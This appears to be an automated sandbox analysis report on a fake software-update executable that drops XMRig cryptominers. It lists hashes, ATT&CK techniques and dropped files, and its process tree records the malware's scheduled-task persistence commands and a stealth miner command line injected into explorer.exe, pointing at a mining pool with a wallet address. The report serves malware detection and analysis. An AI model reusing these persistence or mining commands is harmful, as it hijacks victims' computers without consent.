Analysis

  • max time kernel
    150s
  • max time network
    116s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    19-07-2021 00:03

General

  • Target

    Software updated v2.6.0.exe

  • Size

    256KB

  • MD5

    18d05e20731583a22b495d0d1f107c5b

  • SHA1

    2ced0e3577063ca3613b43661e7df5bc1411ab09

  • SHA256

    b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae

  • SHA512

    36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe
    "C:\Users\Admin\AppData\Local\Temp\Software updated v2.6.0.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1672
    • C:\Users\Admin\AppData\Roaming\xmrmine.exe
      C:\Users\Admin\AppData\Roaming\xmrmine.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1888
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1480
      • C:\Users\Admin\appdata\roaming\serverpatch.exe
        "C:\Users\Admin\appdata\roaming\serverpatch.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1980
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1756
        • C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
          "C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
          4⤵
          • Executes dropped EXE
          PID:1712
        • C:\Windows\explorer.exe
          C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:856
    • C:\Users\Admin\AppData\Roaming\etcmin.exe
      C:\Users\Admin\AppData\Roaming\etcmin.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1296
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:920
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:932
      • C:\Users\Admin\appdata\roaming\rtksmbs.exe
        "C:\Users\Admin\appdata\roaming\rtksmbs.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1536
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1152
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1864
        • C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
          "C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
          4⤵
          • Executes dropped EXE
          PID:540

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Install Root Certificate

1
T1130

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    MD5

    2902de11e30dcc620b184e3bb0f0c1cb

    SHA1

    5d11d14a2558801a2688dc2d6dfad39ac294f222

    SHA256

    e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

    SHA512

    efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB5E2F83CE9B8330B0590B7CD2E5FF2E
    MD5

    d474de575c39b2d39c8583c5c065498a

    SHA1

    5fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25

    SHA256

    7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf

    SHA512

    7b9cf079b9769dfa9eb2e28cf5a4da9922b0f80e415097d326bf20547505a6ab1b7ac6a83846d0b8253e9168b1f915b8974aec844a9b31c3adcab3aec89fcd07

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    f3c6c3bbbfd1a9ecc7b8b39244914347

    SHA1

    bdd6d74b592ad8e93a7189d4a6abb4815bb5cd3f

    SHA256

    653d9ce52affe145ce930b52bbfceb138cb0f689ce28017842af3355b50d544d

    SHA512

    56cd7b0d3282e3d58b8b6c8170ecf31812f89c873c0048ce7479ed63a6da7d723de09c91c44ad0c7e3381abe3e246de96fe159f52f5808f686224f327e54c96a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB5E2F83CE9B8330B0590B7CD2E5FF2E
    MD5

    c02d5bb6ca1f2bfcedfcc810ab6c0d70

    SHA1

    3f84e98b1acb842295b373de45b542b63cdce65b

    SHA256

    2919035d4e34a77b344953d111425dd1d92b111d57c10c77b0d82a4b732f10d6

    SHA512

    202b0d44d64b9346dfa4539fdfc8b2d227263e1cf36f82e785bcc035f4c9a74d19792d6dc40bec01f16a5035be60957f07c6de0cdd11006d3bf09262b543919d

  • C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
    MD5

    f20a5085dbb85927b25ed46a45fe0a13

    SHA1

    41b351e45a7be1d6c6c6918ee65b00f5d69ff787

    SHA256

    370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

    SHA512

    4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

  • C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
    MD5

    e149663730c0b03c8936baffe9645bb4

    SHA1

    c0fb146c35d48481df4149027953e4ab7be59e95

    SHA256

    33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

    SHA512

    553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

  • C:\Users\Admin\AppData\Roaming\etcmin.exe
    MD5

    406f2550d0d4b9b3e2f47994076e8b8b

    SHA1

    01ab414c9d14ef6a10cd1f3c815e2d63ace18822

    SHA256

    4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

    SHA512

    73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

  • C:\Users\Admin\AppData\Roaming\etcmin.exe
    MD5

    406f2550d0d4b9b3e2f47994076e8b8b

    SHA1

    01ab414c9d14ef6a10cd1f3c815e2d63ace18822

    SHA256

    4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

    SHA512

    73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

  • C:\Users\Admin\AppData\Roaming\rtksmbs.exe
    MD5

    406f2550d0d4b9b3e2f47994076e8b8b

    SHA1

    01ab414c9d14ef6a10cd1f3c815e2d63ace18822

    SHA256

    4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

    SHA512

    73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

  • C:\Users\Admin\AppData\Roaming\serverpatch.exe
    MD5

    973037113a1f50e0ca79d3cc42a5ef66

    SHA1

    78235c164ebfa47d613a100abf5c64bed10c1036

    SHA256

    a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

    SHA512

    d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

  • C:\Users\Admin\AppData\Roaming\xmrmine.exe
    MD5

    973037113a1f50e0ca79d3cc42a5ef66

    SHA1

    78235c164ebfa47d613a100abf5c64bed10c1036

    SHA256

    a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

    SHA512

    d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

  • C:\Users\Admin\AppData\Roaming\xmrmine.exe
    MD5

    973037113a1f50e0ca79d3cc42a5ef66

    SHA1

    78235c164ebfa47d613a100abf5c64bed10c1036

    SHA256

    a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

    SHA512

    d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

  • C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
    MD5

    f20a5085dbb85927b25ed46a45fe0a13

    SHA1

    41b351e45a7be1d6c6c6918ee65b00f5d69ff787

    SHA256

    370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

    SHA512

    4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

  • C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
    MD5

    e149663730c0b03c8936baffe9645bb4

    SHA1

    c0fb146c35d48481df4149027953e4ab7be59e95

    SHA256

    33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

    SHA512

    553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

  • C:\Users\Admin\appdata\roaming\rtksmbs.exe
    MD5

    406f2550d0d4b9b3e2f47994076e8b8b

    SHA1

    01ab414c9d14ef6a10cd1f3c815e2d63ace18822

    SHA256

    4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

    SHA512

    73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

  • C:\Users\Admin\appdata\roaming\serverpatch.exe
    MD5

    973037113a1f50e0ca79d3cc42a5ef66

    SHA1

    78235c164ebfa47d613a100abf5c64bed10c1036

    SHA256

    a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

    SHA512

    d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

  • \Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
    MD5

    f20a5085dbb85927b25ed46a45fe0a13

    SHA1

    41b351e45a7be1d6c6c6918ee65b00f5d69ff787

    SHA256

    370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

    SHA512

    4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

  • \Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
    MD5

    e149663730c0b03c8936baffe9645bb4

    SHA1

    c0fb146c35d48481df4149027953e4ab7be59e95

    SHA256

    33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

    SHA512

    553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

  • \Users\Admin\AppData\Roaming\etcmin.exe
    MD5

    406f2550d0d4b9b3e2f47994076e8b8b

    SHA1

    01ab414c9d14ef6a10cd1f3c815e2d63ace18822

    SHA256

    4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

    SHA512

    73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

  • \Users\Admin\AppData\Roaming\rtksmbs.exe
    MD5

    406f2550d0d4b9b3e2f47994076e8b8b

    SHA1

    01ab414c9d14ef6a10cd1f3c815e2d63ace18822

    SHA256

    4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

    SHA512

    73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

  • \Users\Admin\AppData\Roaming\serverpatch.exe
    MD5

    973037113a1f50e0ca79d3cc42a5ef66

    SHA1

    78235c164ebfa47d613a100abf5c64bed10c1036

    SHA256

    a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

    SHA512

    d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

  • \Users\Admin\AppData\Roaming\xmrmine.exe
    MD5

    973037113a1f50e0ca79d3cc42a5ef66

    SHA1

    78235c164ebfa47d613a100abf5c64bed10c1036

    SHA256

    a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

    SHA512

    d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

  • memory/540-114-0x0000000002080000-0x0000000002082000-memory.dmp
    Filesize

    8KB

  • memory/540-103-0x0000000000000000-mapping.dmp
  • memory/540-108-0x000000013FAE0000-0x000000013FAE1000-memory.dmp
    Filesize

    4KB

  • memory/856-123-0x00000000002C0000-0x00000000002E0000-memory.dmp
    Filesize

    128KB

  • memory/856-119-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/856-120-0x00000001402EB66C-mapping.dmp
  • memory/856-125-0x00000000002E0000-0x0000000000300000-memory.dmp
    Filesize

    128KB

  • memory/856-124-0x00000000002C0000-0x00000000002E0000-memory.dmp
    Filesize

    128KB

  • memory/856-121-0x00000000000E0000-0x0000000000100000-memory.dmp
    Filesize

    128KB

  • memory/856-122-0x0000000140000000-0x0000000140758000-memory.dmp
    Filesize

    7.3MB

  • memory/920-75-0x0000000000000000-mapping.dmp
  • memory/932-77-0x0000000000000000-mapping.dmp
  • memory/1152-95-0x0000000000000000-mapping.dmp
  • memory/1296-79-0x000000001C810000-0x000000001C812000-memory.dmp
    Filesize

    8KB

  • memory/1296-73-0x0000000000850000-0x0000000000856000-memory.dmp
    Filesize

    24KB

  • memory/1296-69-0x000000013F2F0000-0x000000013F2F1000-memory.dmp
    Filesize

    4KB

  • memory/1296-65-0x0000000000000000-mapping.dmp
  • memory/1480-78-0x0000000000000000-mapping.dmp
  • memory/1536-111-0x00000000022B0000-0x00000000022B2000-memory.dmp
    Filesize

    8KB

  • memory/1536-89-0x000000013F780000-0x000000013F781000-memory.dmp
    Filesize

    4KB

  • memory/1536-84-0x0000000000000000-mapping.dmp
  • memory/1672-60-0x0000000075971000-0x0000000075973000-memory.dmp
    Filesize

    8KB

  • memory/1712-100-0x0000000000000000-mapping.dmp
  • memory/1712-107-0x000000013F250000-0x000000013F251000-memory.dmp
    Filesize

    4KB

  • memory/1712-113-0x000000001BDA0000-0x000000001BDA2000-memory.dmp
    Filesize

    8KB

  • memory/1756-98-0x0000000000000000-mapping.dmp
  • memory/1812-80-0x00000000008B0000-0x00000000008B2000-memory.dmp
    Filesize

    8KB

  • memory/1812-62-0x0000000000000000-mapping.dmp
  • memory/1812-70-0x000000013FA00000-0x000000013FA01000-memory.dmp
    Filesize

    4KB

  • memory/1812-74-0x0000000000860000-0x0000000000869000-memory.dmp
    Filesize

    36KB

  • memory/1864-97-0x0000000000000000-mapping.dmp
  • memory/1876-83-0x0000000000000000-mapping.dmp
  • memory/1876-90-0x000000013F780000-0x000000013F781000-memory.dmp
    Filesize

    4KB

  • memory/1876-112-0x000000001CA50000-0x000000001CA52000-memory.dmp
    Filesize

    8KB

  • memory/1888-76-0x0000000000000000-mapping.dmp
  • memory/1980-96-0x0000000000000000-mapping.dmp